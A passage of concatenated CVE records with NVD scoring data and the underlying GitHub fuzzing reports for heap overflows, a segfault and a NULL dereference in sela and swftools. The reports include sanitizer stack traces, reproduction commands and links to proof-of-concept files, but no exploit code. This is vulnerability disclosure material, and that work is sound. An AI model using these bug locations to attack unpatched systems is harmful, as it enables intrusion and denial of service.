/home/seviezhou/sela/src/main.cpp:39:37 #3 0x51f553 in main /home/seviezhou/sela/src/main.cpp:85:17 #4 0x7fb55432f83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #5 0x41c5e8 in _start (/home/seviezhou/sela/build/sela+0x41c5e8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/sela/src/file/wav_file.cpp:13:46 in file::WavFile::WavFile(unsigned int, unsigned short, unsigned short, std::vector<data::WavFrame, std::allocator<data::WavFrame> >&&) ==74467==ABORTING ``` ## POC [SEGV-WavFile-wav_file-13.zip](https://github.com/sahaRatul/sela/files/5072669/SEGV-WavFile-wav_file-13.zip)
Segmentation fault in wav_file.cpp:13:46
https://api.github.com/repos/sahaRatul/sela/issues/27/comments
0
2020-08-14T04:56:57Z
2020-08-14T04:56:57Z
https://github.com/sahaRatul/sela/issues/27
678,897,262
27
2,560
CVE-2021-39550
2021-09-20T16:15:13.057
An issue was discovered in sela through 20200412. file::SelaFile::readFromFile() in sela_file.cpp has a heap-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/30" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/30" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sela_project:sela:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EFCB451-9AB9-4111-B4C8-3F9283520F9C", "versionEndExcluding": null, "versionEndIncluding": "2020-04-12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/sahaRatul/sela/issues/30
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sahaRatul", "sela" ]
## System info Ubuntu x86_64, clang 6.0, sela (latest master [ca09cb](https://github.com/sahaRatul/sela/commit/ca09cbd80bd6084bca08288d980c7f6928571bbb)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/sela -d @@ /dev/null ## AddressSanitizer output ``` ================================================================= ==14920==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a000005776 at pc 0x000000548e15 bp 0x7fffc4c572d0 sp 0x7fffc4c572c8 READ of size 1 at 0x62a000005776 thread T0 #0 0x548e14 in file::SelaFile::readFromFile(std::basic_ifstream<char, std::char_traits<char> >&) /home/seviezhou/sela/src/file/sela_file.cpp:90:53 #1 0x56d713 in sela::Decoder::readFrames() /home/seviezhou/sela/src/sela/decoder.cpp:38:14 #2 0x56d713 in sela::Decoder::process() /home/seviezhou/sela/src/sela/decoder.cpp:97 #3 0x51dbe8 in decodeFile(std::basic_ifstream<char, std::char_traits<char> >&, std::basic_ofstream<char, std::char_traits<char> >&) /home/seviezhou/sela/src/main.cpp:39:37 #4 0x51f553 in main /home/seviezhou/sela/src/main.cpp:85:17 #5 0x7f7cb33b783f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #6 0x41c5e8 in _start (/home/seviezhou/sela/build/sela+0x41c5e8) 0x62a000005776 is located 3 bytes to the right of 21875-byte region [0x62a000000200,0x62a000005773) allocated by thread T0 here: #0 0x518278 in operator new(unsigned long) /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_new_delete.cc:92 #1 0x54c83a in __gnu_cxx::new_allocator<char>::allocate(unsigned long, void const*) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/ext/new_allocator.h:111:27 #2 0x54c83a in std::allocator_traits<std::allocator<char> >::allocate(std::allocator<char>&, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/alloc_traits.h:436 #3 0x54c83a in std::_Vector_base<char, std::allocator<char> >::_M_allocate(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:296 #4 0x54c83a in std::vector<char, std::allocator<char> >::_M_default_append(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/vector.tcc:604 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/sela/src/file/sela_file.cpp:90:53 in file::SelaFile::readFromFile(std::basic_ifstream<char, std::char_traits<char> >&) Shadow bytes around the buggy address: 0x0c547fff8a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c547fff8ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[03]fa 0x0c547fff8af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8b00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==14920==ABORTING ``` ## POC [heap-overflow-readFromFile-sela_file-90.zip](https://github.com/sahaRatul/sela/files/5072683/heap-overflow-readFromFile-sela_file-90.zip)
A heap-buffer-overflow in sela_file.cpp:90:53
https://api.github.com/repos/sahaRatul/sela/issues/30/comments
0
2020-08-14T05:02:24Z
2020-08-14T05:02:24Z
https://github.com/sahaRatul/sela/issues/30
678,899,213
30
2,561
CVE-2021-39551
2021-09-20T16:15:13.103
An issue was discovered in sela through 20200412. file::SelaFile::readFromFile() in sela_file.c has a heap-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/26" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sela_project:sela:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EFCB451-9AB9-4111-B4C8-3F9283520F9C", "versionEndExcluding": null, "versionEndIncluding": "2020-04-12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/sahaRatul/sela/issues/26
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sahaRatul", "sela" ]
## System info Ubuntu x86_64, clang 6.0, sela (latest master [ca09cb](https://github.com/sahaRatul/sela/commit/ca09cbd80bd6084bca08288d980c7f6928571bbb)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/sela -d @@ /dev/null ## AddressSanitizer output ``` ================================================================= ==36806==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a000005775 at pc 0x000000548d25 bp 0x7ffef4e9b430 sp 0x7ffef4e9b428 READ of size 1 at 0x62a000005775 thread T0 #0 0x548d24 in file::SelaFile::readFromFile(std::basic_ifstream<char, std::char_traits<char> >&) /home/seviezhou/sela/src/file/sela_file.cpp:78:67 #1 0x56d713 in sela::Decoder::readFrames() /home/seviezhou/sela/src/sela/decoder.cpp:38:14 #2 0x56d713 in sela::Decoder::process() /home/seviezhou/sela/src/sela/decoder.cpp:97 #3 0x51dbe8 in decodeFile(std::basic_ifstream<char, std::char_traits<char> >&, std::basic_ofstream<char, std::char_traits<char> >&) /home/seviezhou/sela/src/main.cpp:39:37 #4 0x51f553 in main /home/seviezhou/sela/src/main.cpp:85:17 #5 0x7fa6b3dd783f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #6 0x41c5e8 in _start (/home/seviezhou/sela/build/sela+0x41c5e8) 0x62a000005775 is located 2 bytes to the right of 21875-byte region [0x62a000000200,0x62a000005773) allocated by thread T0 here: #0 0x518278 in operator new(unsigned long) /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_new_delete.cc:92 #1 0x54c83a in __gnu_cxx::new_allocator<char>::allocate(unsigned long, void const*) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/ext/new_allocator.h:111:27 #2 0x54c83a in std::allocator_traits<std::allocator<char> >::allocate(std::allocator<char>&, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/alloc_traits.h:436 #3 0x54c83a in std::_Vector_base<char, std::allocator<char> >::_M_allocate(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:296 #4 0x54c83a in std::vector<char, std::allocator<char> >::_M_default_append(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/vector.tcc:604 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/sela/src/file/sela_file.cpp:78:67 in file::SelaFile::readFromFile(std::basic_ifstream<char, std::char_traits<char> >&) Shadow bytes around the buggy address: 0x0c547fff8a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff8ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c547fff8ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[03]fa 0x0c547fff8af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8b00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff8b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==36806==ABORTING ``` ## POC [heap-overflow-readFromFile-sela_file-78.zip](https://github.com/sahaRatul/sela/files/5072665/heap-overflow-readFromFile-sela_file-78.zip)
A heap-buffer-overflow in sela_file.cpp:78:67
https://api.github.com/repos/sahaRatul/sela/issues/26/comments
0
2020-08-14T04:54:33Z
2020-08-14T04:54:33Z
https://github.com/sahaRatul/sela/issues/26
678,896,429
26
2,562
CVE-2021-39552
2021-09-20T16:15:13.143
An issue was discovered in sela through 20200412. file::WavFile::readFromFile() in wav_file.c has a heap-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/23" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/23" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sela_project:sela:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EFCB451-9AB9-4111-B4C8-3F9283520F9C", "versionEndExcluding": null, "versionEndIncluding": "2020-04-12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/sahaRatul/sela/issues/23
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sahaRatul", "sela" ]
## System info Ubuntu x86_64, clang 6.0, sela (latest master [ca09cb](https://github.com/sahaRatul/sela/commit/ca09cbd80bd6084bca08288d980c7f6928571bbb)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/sela -e @@ /dev/null ## AddressSanitizer output ``` ================================================================= ==65004==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6160000008d0 at pc 0x00000055d64b bp 0x7ffc37ec4b00 sp 0x7ffc37ec4af8 READ of size 1 at 0x6160000008d0 thread T0 #0 0x55d64a in signed char* std::__copy_move<false, false, std::random_access_iterator_tag>::__copy_m<char*, signed char*>(char*, char*, signed char*) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_algobase.h:324:20 #1 0x55d64a in signed char* std::__copy_move_a<false, char*, signed char*>(char*, char*, signed char*) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_algobase.h:385 #2 0x55d64a in signed char* std::__copy_move_a2<false, __gnu_cxx::__normal_iterator<char*, std::vector<char, std::allocator<char> > >, signed char*>(__gnu_cxx::__normal_iterator<char*, std::vector<char, std::allocator<char> > >, __gnu_cxx::__normal_iterator<char*, std::vector<char, std::allocator<char> > >, signed char*) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_algobase.h:422 #3 0x55d42b in void std::vector<signed char, std::allocator<signed char> >::_M_range_initialize<__gnu_cxx::__normal_iterator<char*, std::vector<char, std::allocator<char> > > >(__gnu_cxx::__normal_iterator<char*, std::vector<char, std::allocator<char> > >, __gnu_cxx::__normal_iterator<char*, std::vector<char, std::allocator<char> > >, std::forward_iterator_tag) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_algobase.h:454:15 #4 0x557b9b in void std::vector<signed char, std::allocator<signed char> >::_M_initialize_dispatch<__gnu_cxx::__normal_iterator<char*, std::vector<char, std::allocator<char> > > >(__gnu_cxx::__normal_iterator<char*, std::vector<char, std::allocator<char> > >, __gnu_cxx::__normal_iterator<char*, std::vector<char, std::allocator<char> > >, std::__false_type) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:1437:4 #5 0x557b9b in std::vector<signed char, std::allocator<signed char> >::vector<__gnu_cxx::__normal_iterator<char*, std::vector<char, std::allocator<char> > >, void>(__gnu_cxx::__normal_iterator<char*, std::vector<char, std::allocator<char> > >, __gnu_cxx::__normal_iterator<char*, std::vector<char, std::allocator<char> > >, std::allocator<signed char> const&) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:546 #6 0x55156b in file::WavFile::readFromFile(std::basic_ifstream<char, std::char_traits<char> >&) /home/seviezhou/sela/src/file/wav_file.cpp:160:40 #7 0x5655b3 in sela::Encoder::readFrames() /home/seviezhou/sela/src/sela/encoder.cpp:37:13 #8 0x5655b3 in sela::Encoder::process() /home/seviezhou/sela/src/sela/encoder.cpp:97 #9 0x51d568 in encodeFile(std::basic_ifstream<char, std::char_traits<char> >&, std::basic_ofstream<char, std::char_traits<char> >&) /home/seviezhou/sela/src/main.cpp:32:39 #10 0x51ef56 in main /home/seviezhou/sela/src/main.cpp:75:17 #11 0x7f16fe66183f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #12 0x41c5e8 in _start (/home/seviezhou/sela/build/sela+0x41c5e8) 0x6160000008d0 is located 0 bytes to the right of 592-byte region [0x616000000680,0x6160000008d0) allocated by thread T0 here: #0 0x518278 in operator new(unsigned long) /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_new_delete.cc:92 #1 0x54c83a in __gnu_cxx::new_allocator<char>::allocate(unsigned long, void const*) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/ext/new_allocator.h:111:27 #2 0x54c83a in std::allocator_traits<std::allocator<char> >::allocate(std::allocator<char>&, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/alloc_traits.h:436 #3 0x54c83a in std::_Vector_base<char, std::allocator<char> >::_M_allocate(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:296 #4 0x54c83a in std::vector<char, std::allocator<char> >::_M_default_append(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/vector.tcc:604 SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_algobase.h:324:20 in signed char* std::__copy_move<false, false, std::random_access_iterator_tag>::__copy_m<char*, signed char*>(char*, char*, signed char*) Shadow bytes around the buggy address: 0x0c2c7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff80d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff80e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff80f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff8100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2c7fff8110: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa 0x0c2c7fff8120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff8130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff8150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff8160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==65004==ABORTING ``` ## POC [heap-overflow-readFromFile-wav_file-160.zip](https://github.com/sahaRatul/sela/files/5072451/heap-overflow-readFromFile-wav_file-160.zip)
A heap-buffer-overflow in wav_file.cpp:160:40
https://api.github.com/repos/sahaRatul/sela/issues/23/comments
0
2020-08-14T02:49:47Z
2020-08-14T04:50:32Z
https://github.com/sahaRatul/sela/issues/23
678,857,762
23
2,563
CVE-2021-39553
2021-09-20T16:15:13.187
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function grealloc() located in gmem.cc. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Technical Description" ], "url": "https://github.com/matthiaskramm/swftools/issues/103" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Technical Description" ], "url": "https://github.com/matthiaskramm/swftools/issues/103" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/103
[ "Exploit", "Issue Tracking", "Technical Description" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), pdf2swf (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./pdf2swf -qq -z -o /dev/null ./stack-overflow-grealloc-gmem-156 ## Output ``` Error: PDF file is damaged - attempting to reconstruct xref table... Error: Wrong type in font encoding resource differences (cmd) Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` Error: PDF file is damaged - attempting to reconstruct xref table... Error: Wrong type in font encoding resource differences (cmd) ASAN:SIGSEGV ================================================================= ==68956==ERROR: AddressSanitizer: stack-overflow on address 0x7ffeeba07ff0 (pc 0x7fd321caa24e bp 0x000000000080 sp 0x7ffeeba07fe0 T0) #0 0x7fd321caa24d (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xb024d) #1 0x7fd321ca9d47 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xafd47) #2 0x7fd321c1cebf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x22ebf) #3 0x7fd321c925e2 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x985e2) #4 0x557ed05733d7 in grealloc(void*, int, bool) xpdf/gmem.cc:156 #5 0x557ed05d1f69 in Array::add(Object*) xpdf/Array.cc:47 #6 0x557ed05e4d64 in Lexer::Lexer(XRef*, Stream*) xpdf/Lexer.cc:54 #7 0x557ed05da8da in XRef::fetch(int, int, Object*) xpdf/XRef.cc:809 #8 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #9 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #10 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #11 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #12 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #13 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #14 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #15 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #16 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #17 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #18 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #19 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #20 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #21 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #22 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #23 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #24 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #25 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #26 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #27 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #28 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #29 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #30 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #31 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #32 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #33 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, 